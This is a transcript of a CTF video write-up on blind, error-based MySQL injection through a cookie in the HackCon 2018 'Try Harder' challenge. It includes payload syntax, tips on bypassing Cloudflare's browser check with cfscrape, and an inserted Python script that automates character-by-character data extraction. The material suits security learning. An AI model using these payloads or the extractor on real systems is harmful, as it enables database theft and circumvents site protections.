Hello, Internet! This is kind of a video write-up for the challenge Try Harder, for 150 points in the web category of HackCon CTF 2018. So, full disclaimer, I say this is kind of a video write-up because this is a little different. I am not going to be writing code. I'm not going to be doing this kind of side-by-side with you. I'm actually going to be replaying some of the live raw footage from while I was playing this competition, very, very sped up, so epilepsy warning, I guess, and you'll see all of the rabbit holes and missteps and everything that I took while playing it live. Because the old service that this challenge originally came with was given as an IP address, not a domain, because it didn't have a whole lot of protections, I guess. I guess it just wasn't stable, because that hosted the website and it got hammered and brought down a lot. It was just unstable. So the CTF organizers decided, okay, let's host it somewhere else and let's put on this Cloudflare DDoS protection. So it uses the panic mode, I think. I think that's what it's called. I think that's the name of it, where it will check your browser, make sure you're running JavaScript or whatever, and it will take five seconds to load the page. And it was agony, and is agony, for what this kind of challenge actually is, considering it's like blind error-based SQL injection. So I want to showcase it because I don't think there are a whole lot of video write-ups or even text write-ups. I haven't seen anything on this challenge before, but I wanted to give it to you so someone in the world covered it. But again, partial video write-up, in that I don't get the full flag. I didn't finish this during the CTF, but I understand and know the solution now after the game. So I still want to show it to you and hope you guys can bear with me for this. So I want to prove this to you.
If I go to this URL, you'll see there's this Cloudflare DDoS protection, and after a crap ton of time that's wasted, especially if you're trying to automate an attack, you'll get the web page. I will showcase that you can actually script this. Originally, myself and YigglesMoto and Monorail and other people that I was playing this with didn't think that we could script automating our interaction with the website because of that Cloudflare protection. We recently found this cfscrape GitHub that will allow us to do that, just like that. If you want to Google that, you certainly can, but it's simple. It essentially just mocks the requests library in Python, but will allow you to go through that Cloudflare protection because it's, I don't know, pretending to run JavaScript or whatever. But that's handy. However, it still takes five seconds for it to return the page. So if I run this, it's going to do that Cloudflare check and eventually I'll get a page returned. You can see I've just an exit saving here. Eventually I'll get the output of the web page. However, if I tried to do this for a blind SQL injection when I'm trying to leak information out, I don't want to wait five seconds for literally every single request that I'm doing. So this is just agonizing and was not readily usable and accessible during the game. The original script that I use, I just use against the original website, the first one that they released. However, right now that is down. It is not up. So I cannot show you this attack like that. That's why I want to showcase the live footage that I recorded. So I'm sorry, enough of me talking. This is probably going to be a super long video and I really apologize for that. But hopefully it'll be worth it, showcasing cool, cool things. Let's play this video. So I'll speed this up. Again, epilepsy warning. You'll see a lot of Discord notifications. You'll see me talking, because this is my raw live footage. Shameless self-advertisement.
If you aren't in a Discord server, please do join. You can see the camaraderie, the brotherhood, the family-ness crap like that that we're doing right now. We're all in voice and I'm chatting with some of these other people that are attacking this with me. So off on the side, you can see my Sublime Text window. I've gone over to the website, creating a session, getting the cookie out. And I didn't see this hint originally. It said, don't touch my cookie. But Yiggles pointed out to me that eventually, when that was released, we noted it in there. I was actually just testing with the cookie involved and I don't think they were. But I got success with the cookie in there and they weren't. And I brought it up to them and they said, oh, okay, crap. That must be why it's actually in there. So we started to test, because they found SQL injection in that cookie. And that was awesome. That gave us a little bit of a lead. Now we had to figure out what we were doing. You saw me just script there, trying to connect to the Cloudflare one, but it just didn't work. So I went back to the old service. We didn't know about cfscrape at that time. We found it a day later and it still sucks. So, CTF organizers and CTF planners, do not put I'm Under Attack mode for Cloudflare on a SQL injection challenge. Pretty, pretty please. I understand the issue, but okay. So I am testing the cookie with a lot of SQL injection and I'm trying to determine what errors I can find. I'm seeing this "Truncated incorrect DOUBLE value", which is the cookie down there. So I see interesting things are happening. I'm getting weird results, and I showed this to people in the Discord, like, I don't know why I got some of those values or some of those responses, like "try to brute force a list of possible account names", etc. That was really weird. But I am getting some errors out of it. So I kept testing, and that's what a lot of this video is going to be, where I'm just testing things.
So I'm sorry, bear with me. Maybe you'll learn a few things, because through this research and through what I've been trying to learn, I did pick up some interesting tidbits, like this IF syntax for MySQL. I had no idea that that was a thing, and it's pretty handy. Especially if you do have a SQL injection vector and you're trying to do blind SQL injection, maybe this could be of use. So I actually ended up figuring out this condition setup where I would test a condition and determine, okay, whether that condition is true or whether that condition is false. And you'll see what I do in just a little bit here, after I kind of get the hang of the syntax: I determine, okay, let's just return a string or something that I know will error out with that "Truncated incorrect DOUBLE value", because for some reason that is always going to spit out an error. I can use that to test if my condition failed, and I know I'll get a result. So okay, that's an inkling of blind SQL injection. Maybe I can weaponize that. Maybe I can use that to my advantage. So here I pull up my SQL injection cheat sheet. That's on my GitHub. I share it with my Discord. You're totally welcome to use it for sure as well. I found that to be very, very handy. If I have explicit SQLi or blind SQLi, I can use that to leak out any portion of a database that I particularly want to, once I've figured out an attack vector. Here I'm finding interesting things about the database, like this "unhackable." thing. So unhackable being the database name, and whatever I'm looking at being the table, though that was pretty handy. I didn't end up using it at all. But again, doing this testing and fuzzing is awesome for doing whatever recon or enumeration or trying to figure out whatever we can here. I don't know what I'm doing at this point, trying to determine if I can leak any other tables out, any other fields. And you can see I'm getting that occasional error, and that my condition didn't work.
And I noticed that I was getting this "Row 64 was cut off by GROUP_CONCAT()". So it seemed to be like truncating what I was trying to leak out, and that there were multiple rows. So I think I tested with like limits, like LIMIT 1, etc. And after some other tinkering, I was able to find the version, and I thought like, okay, that's actually returning a full-on string. That's like essentially explicit SQL if I could actually get any traction with that. But I wasn't able to. I showed this around to the guys in the Discord server, but I wasn't able to get anything else with it. Even when I thought, can I get strings just straight up displayed to me? I even tried this. I went down this rabbit hole for a while. I was testing, can I cast something as a string with VARCHAR or str or whatever functions MySQL could offer for me? And I just couldn't get anywhere with it. So again, worthwhile testing, learning experience, whatever. The whole point is to be banging your head against the wall long enough that something breaks through. And that's why this challenge is called Try Harder. That's why my script is called Ape, because I am of the mindset where I throw stuff at the wall and see what sticks, and this video itself is even an hour long. However, it does get cut off. So I don't want to be a disappointment here. But once I get the vulnerability, once I actually find the payload that will get a blind SQL injection query, for some reason my keyboard just stops working and I have to reboot. I told everyone in the Discord server and it sucked. It was awful. But it was so exciting, because after I reviewed it, like, okay, let's weaponize this more. Let's leak out something else. I thought I had a little bit of an attack right here, where I could get row, blah, blah, blah, which would be a success, or otherwise get my condition errored. But it wouldn't give me what I wanted.
And I just didn't feel comfortable with that, because I wasn't able to actually determine any password or ID field, etc., etc. So I saw this weird error that said you can't select this table users for update, etc. So it says I couldn't use anything, whatever, as an update. And I thought, how can I get around that? I've never seen that error before. So this is where I researched. You see me on Stack Overflow, and I learned a little bit about MySQL aliases, where you can select a whole other table as something else, and just trying to kind of treat it as like a temporary variable that you can still look through. So I tried to see if I could get that right: rather than selecting that table, I did select something from that table as an alias. And I had to get the syntax right. I had to keep playing with parentheses here. So I ended up with some disgusting payload, and I'm really sorry for that. But I did get that to work. I was able to select all from users eventually with an alias set up. I think I needed a little extra set of parentheses. So I know my payload is getting very, very strange, and it's probably hard to follow at this point. Again, I wanted to show you this because no one else has, and maybe you'll learn a little bit from it even if it is like rapid fireworks on your screen. At this point, I try other ideas. I'm trying to change whether or not my OR statement at the very beginning would be more effective as an AND statement. I'm probably just going a little bit insane. I'm probably just grasping at straws. But again, that's the testing that I've got to be doing. I'm trying to do stupid conditionals like WHERE 1=1, which I know should return something, and WHERE 1=2, which I know should error out. But it didn't seem like I was getting something. It didn't seem like WHERE 1=2 would return anything else. So I thought, okay, for some reason that is still evaluating correctly and I have no idea why.
It probably was just returning a null response, which for whatever reason MySQL was still willing to handle. So whatever. I wanted to use UNION SELECT because that is my typical go-to for blind SQL injections. But again, this was just a weird challenge where it would convert everything to a double if it just kind of like hung out there in space. I promise I'll get to an actual working payload at some point. And I know you probably hate just listening to me talk right now. Whatever, internet anxiety, whatever, haters. Trying to concatenate some things. These are just dead ends that I'm looking around at. Again, I'm trying my LIMIT 1 to see if I can only get one response, not that row. Massive amount of numbers for whatever reason. At this point, I tried to see if I could force MySQL to throw an error, because I didn't feel that comfortable with the condition. And you can see I kind of moved on from the IF statement. So I kept trying to tinker with other things. Keep an eye on the clock here. You can see how long this is moving. You could also see the music that I was listening to. I like to listen to like retrowave or techno or EDM when I'm hacking, when I'm going through CTFs and stuff. YigglesMoto started to try and do some like local file inclusion, see if we could actually get responses with trying to read a file out. Didn't seem to get anything. With a try, I think we were just poking around in the SQL injection cheat sheet that I have, whatever, for our own learning purposes too. We're all here to learn. Please do join the Discord server if you're into this and you want to be part of a team and you want to be together with people that are just trying to get better, trying to improve. We're all passionate about it and stuff. I also personally welcome whoever joins the Discord server. You saw that notification just come up. So join the Discord server. I'll personally welcome you. It's cool. "Subquery returns more than one row."
Again, I try and limit things at this point. I think I get a little bit of a breakthrough, where I'm determining that AND will work and it's actually getting some results with password greater than or less than stupid things. So I share this in the Discord server, and I'm excited about it because it looks like a lead. I'm able to actually get an error if the password equals null, which it doesn't, but I'm able to get a response if it's greater than something else. So like, okay, perfect. This is the makings of a blind SQL injection attack. Finally got a payload that does something. So I start to test this. I go ahead and get my thresholds ready, where I've got an error cat, I'm sorry, an error caught, or an error catched (catched is not the right word), or a success. And I can finally start to piece this together. So I thought originally, like, I can't trust any of the lists that I've created before. I'm just going to loop through the ASCII table. I'm just going to loop through numbers. I actually asked in my Discord server, hey, does anyone have an ASCII table, or does anyone know it? And Monorail, you saw the notification up there, Googled an ASCII table for me. I felt like a shithead for not just doing it on my own. Thank you. Thank you, Monorail. I appreciate the teamwork, but we were just getting excited because we thought we had a weaponized attack. So I go ahead and open up another blind SQL injection script that I've had, just grab a list of printable characters, and I start to run through stuff. I realized that I had to switch where I was getting things appended right here. You can see I put it in the wrong section. I want to add a new character if I actually get an error, so I know that I've hit the threshold. And I start to leak, and I realize, oh crap. Okay. I'm not going to actually get lowercase letters in this case. I got a D. I got a 4. So I know I'm getting the flag and I'm like, uh, I need lowercase.
So let's just put BINARY in every single SELECT statement I had to see what would hit. And eventually, like, nothing, nothing got it. So I was like, all right, fine. I'll remove all the BINARY and just go back to getting it in all caps, because I know it'll all be lowercase. That's what the flag format has been for these challenges. Starting to get the flag format, getting excited. My keyboard starts to break and I have no idea why. I'm moving things around with my mouse because I just straight up can't type anything. I'm yelling at the guys in my Discord server and something's weird. It got caught on a quotation mark and that was very strange. So the video ended. I'm sorry, because I had to reboot and I didn't record following that, but I started to leak out the flag and it gave me dark, uh, why, with like four H's and four Y's, and then an underscore, and then SQL1 exclamation point underscore, and things started to get really weird and really wonky from that point on. I wasn't able to actually get anything following this segment. Uh, and I couldn't figure out why. Um, we literally were not able to get anything else to leak out. So what we actually ended up doing, if I can open the script here, is we started to look for other IDs that weren't ID 1. We figured, okay, ID 1 must have been whatever, admin, but we thought like, is the rest of the flag stored somewhere else? And we started to test for, like, leaking out things where ID equals 2 or ID equals 3, et cetera, et cetera. And we were getting results, and they started to look like hashes, and we thought like, oh, whatever, that's probably just normal. That's probably just trying to make it simulate like a real-world thing where passwords are stored as a hash, and we didn't do anything with them. I think YigglesMoto tried to, uh, crack the hash on one of them while we got like a portion of it leaked out, and he said that like, oh, this is a partial match for the letter R. I was like, what the heck?
Okay. That's probably garbage, because they're probably just filling it with random data, and at this point there's like seven minutes left in the competition and we're freaking out, because we're like, why isn't this working? Oh yeah, the S was a 5. You can see me starting to get the list. Why couldn't we get the flag? Why was nothing else returning? What was going on, when the rest of the attack was working just fine? And as it turns out, as I went to talk with the admins later (I was just freaking out in the Telegram, like screaming, are there any admins around? and no one was there at the time). So the following morning after the game ended, we're all just pretty heartbroken, because we really wanted to get this, like, hundred-whatever garbage point challenge that only like five people had solved, and we looked, we felt like we had a lead and whatever. It just fell through. So in the morning, I chatted with the guys, explained that this was my payload, explained that it was weird that I wasn't getting anything else, explained that I was using the old service, and he was like, oh, oh, oh, oh. It all happened because the new service, the one with the Cloudflare domain, actually has the flag all on that one row. And we didn't know that, nor could we particularly script, well, that Cloudflare-protected one, but in the old service, what they had was they had the rest of the flag stored in those other ID numbers, like 2, 3, 4, the things that we were leaking out, as MD5 hashes of each letter. And oh, that pissed me off so bad, because we had it. We were literally looking at each segment of the flag once we got it to leak out. We saw a letter R and we didn't piece together that that was the rest of the flag, just in different pieces. So again, I'm sorry, I can't show you this, but take my word for it.
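The whole procedure the video walks through, pulled together as an added example that is not the author's Ape script or the challenge's own code: an `IF(cond, 1, 'x')` oracle where the false branch drops a string into a numeric slot and triggers "Truncated incorrect DOUBLE value", a derived-table alias `(SELECT * FROM users) AS u` so the subquery on `users` does not hit the "can't specify target table ... for update" error, a `password >= 'candidate'` comparison driven by binary search instead of a linear scan of the ASCII table, `BINARY` to get case-sensitive results, and finally the reversal of the per-letter MD5 rows in ids 2, 3, 4, ... Everything below runs against a constructed stand-in for the service, so the table contents, the flag text, the `users`/`id`/`password` names and the assumption that a non-numeric string in that position raises error 1292 are all this example's own, not facts from the video; only the error messages and the general technique come from the write-up.

```python
"""Blind, error-based SQLi oracle of the kind described in the write-up,
run against a constructed fake backend so it executes offline."""
import hashlib
import re
import string

# --- constructed stand-in for the CTF service (NOT the real one) ----------
# Row 1 holds the first flag fragment; rows 2.. hold MD5(one character) each,
# the layout the video says the old service used. Values are made up here.
_CONSTRUCTED_ROWS = {1: "dark_hhhh_yyyy_sql1!_"}
_CONSTRUCTED_ROWS.update({i + 2: hashlib.md5(c.encode()).hexdigest()
                          for i, c in enumerate("try_harder")})

# The fake server only understands the exact payload shape built below.
_PAYLOAD_RE = re.compile(
    r"IF\(\(SELECT (BINARY )?password FROM \(SELECT \* FROM users\) AS u "
    r"WHERE id=(\d+)\) >= '([^']*)', 1, 'x'\)"
)


def fake_server(cookie: str) -> str:
    """Model the page's behaviour (assumption): when the IF condition is
    false, the string 'x' ends up in a numeric slot and strict-mode MySQL
    answers with error 1292; otherwise the normal page comes back."""
    m = _PAYLOAD_RE.search(cookie)
    if not m:
        return "Welcome back, user 1"
    binary, row_id, candidate = m.group(1), int(m.group(2)), m.group(3)
    stored = _CONSTRUCTED_ROWS.get(row_id, "")   # missing row -> NULL -> false
    if binary:                                    # BINARY: byte-wise compare
        cond = stored.encode() >= candidate.encode()
    else:                                         # default collation, approximated
        cond = stored.upper() >= candidate.upper()
    if cond:
        return "Welcome back, user 1"
    return "ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'x'"


# --- the attacker-side pieces --------------------------------------------
def payload(row_id: int, candidate: str, case_sensitive: bool) -> str:
    """Cookie value: true branch -> integer 1 (harmless), false branch -> the
    string 'x' (error). The derived table (SELECT * FROM users) AS u is the
    alias trick that avoids MySQL error 1093 on the users table."""
    col = "BINARY password" if case_sensitive else "password"
    return (f"1 AND IF((SELECT {col} FROM (SELECT * FROM users) AS u "
            f"WHERE id={row_id}) >= '{candidate}', 1, 'x')")


def oracle(row_id, candidate, case_sensitive, send=fake_server) -> bool:
    """True when no error came back, i.e. password >= candidate holds."""
    body = send(payload(row_id, candidate, case_sensitive))
    return "Truncated incorrect DOUBLE" not in body


def charset(case_sensitive: bool):
    # Quote, backslash and space are left out: they break the quoted
    # literal (the video's run snagged on a quotation mark for that reason).
    chars = [c for c in string.printable if c.isprintable() and c not in " '\\"]
    if not case_sensitive:
        # Without BINARY the collation folds case, so only keep one case;
        # leaked letters come back upper-case, as in the video.
        chars = [c for c in chars if not c.islower()]
    return sorted(chars)          # byte order == comparison order here


def leak(row_id: int, case_sensitive: bool, send=fake_server, max_len=64) -> str:
    """Recover one column value character by character. For each position
    the predicate password >= prefix+c is true for c up to the real
    character and false beyond it, so a binary search finds it in
    ~log2(len(charset)) requests instead of one request per ASCII value."""
    chars = charset(case_sensitive)
    found = ""
    for _ in range(max_len):
        if not oracle(row_id, found + chars[0], case_sensitive, send):
            break                 # nothing >= the smallest char: end of value
        lo, hi = 0, len(chars) - 1
        while lo < hi:            # largest index whose test still passes
            mid = (lo + hi + 1) // 2
            if oracle(row_id, found + chars[mid], case_sensitive, send):
                lo = mid
            else:
                hi = mid - 1
        found += chars[lo]
    return found


def recover_md5_letters(hex_digests) -> str:
    """Rows 2.. hold MD5(single character): reverse them by lookup."""
    table = {hashlib.md5(c.encode()).hexdigest(): c for c in string.printable}
    return "".join(table.get(h.lower(), "?") for h in hex_digests)


def solve(send=fake_server) -> str:
    head = leak(1, case_sensitive=True, send=send)
    digests, row = [], 2
    while True:                   # hex is case-insensitive, so BINARY not needed
        h = leak(row, case_sensitive=False, send=send)
        if not h:
            break
        digests.append(h)
        row += 1
    return head + recover_md5_letters(digests)


if __name__ == "__main__":
    print(solve())
```

Against a live target `send` would be the function that performs the HTTP request with the payload in the cookie (with cfscrape, the session returned by `cfscrape.create_scraper()` can be used like a `requests` session); the point of the binary search is that each leaked character costs about seven requests rather than up to ninety-odd, which matters when every request sits behind a five-second browser check.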
Once you have this payload, GROUP_CONCAT, SELECT id, blah, blah, blah, WHERE id equals this thing AND password is greater than this, and that's probably disgusting. It probably could be cleaner than this, but we got it to work with that, and we were able to leak out a password, and we were able to do the blind, error-based SQL injection. So that first part of the flag that we got following, had we been able to leak out the rest of those ID numbers, had the game not ended, had the game not been delayed a day and also cut down to 12 hours, whatever, I'm not bitter, maybe we would have got the challenge. Awesome learning experience in my mind. We still solved it. We still attacked. We got the exploit, we got the payload and everything working. So I was really happy with it, and I did want to share it with you guys. I hope you were able to enjoy this video, despite it being very weird and very strange. Thanks for watching. All right. Hey, quick shout-out to the people that support me on Patreon. Thank you guys so much. One dollar or more on Patreon will give you a special shout-out just like this at the end of every video. $5 or more on Patreon will give you early access to everything I release on YouTube before it goes live, because I like to record in bulk and then gradually YouTube-schedule the releases on a day-by-day basis or whatever. If you did like this video, please do like, comment and subscribe, especially if you want to see more CTF video write-ups and other programming tutorials. Please join our Discord server. It is an awesome family of CTF players, programmers and hackers, and we're just open to everyone. We're going to be playing iCTF and Nighthawk CTF as they're coming. So yeah, come hang out with me and other cool people. I'd love to see you guys on Patreon. That would be phenomenal, and I would love to see you in the next video. Thanks. Later.